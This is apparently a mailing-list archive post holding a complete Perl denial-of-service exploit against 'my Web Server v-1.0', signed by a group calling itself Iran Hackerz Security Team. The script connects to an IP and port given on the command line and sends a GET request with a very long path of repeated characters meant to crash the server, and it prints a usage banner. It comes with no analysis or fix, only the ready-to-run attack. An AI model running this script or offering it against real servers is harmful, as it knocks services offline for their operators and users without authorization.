<<< Date Index >>>     <<< Thread Index >>>

my Web Server << v-1.0 Denial of Service Exploit



#!/usr/bin/perl
#my Web Server << v-1.0 Denial of Service Exploit
#vendor : Eitsop.s5.com
use IO::Socket;
use strict;

my($socket) = "";
      
if($socket = IO::Socket::INET->new(
                PeerAddr => $ARGV[0],
                PeerPort => $ARGV[1],
                Proto => "TCP"))
{
        print "++++++++++++++++++++++++++++++\n";
        print "Connecting to $ARGV[0]:$ARGV[1] ...\n";
        print "++++++++++++++++++++++++++++++\n";
        print "Exploit Send successfuly!!\n";
        print "++++++++++++++++++++++++++++++\n";
        print $socket "GET 
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 HTTP/1.0\r\n\r\n";
        close($socket);
}
else
{
        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
        print "  ___ ___                __                         \n";
        print " /   |   \_____    ____ |  | __ ___________________ \n";
        print "/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / \n";
        print "\    Y    // __ \\  \___|    <\  ___/|  | \//    /  \n";
        print " \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ \n";
        print "       \/      \/     \/     \/    \/            \/ \n";
        print "             Iran Hackerz Security Team             \n";
        print "    WebSite's: www.hackerz.ir & www.h4ckerz.com     \n";
        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
        print "[Usage]perl myws.pl <IP> <Port>                     \n";
        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
        print "[Status]Can Not Connect To >> $ARGV[0]:$ARGV[1]     \n";
        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
}
#EoF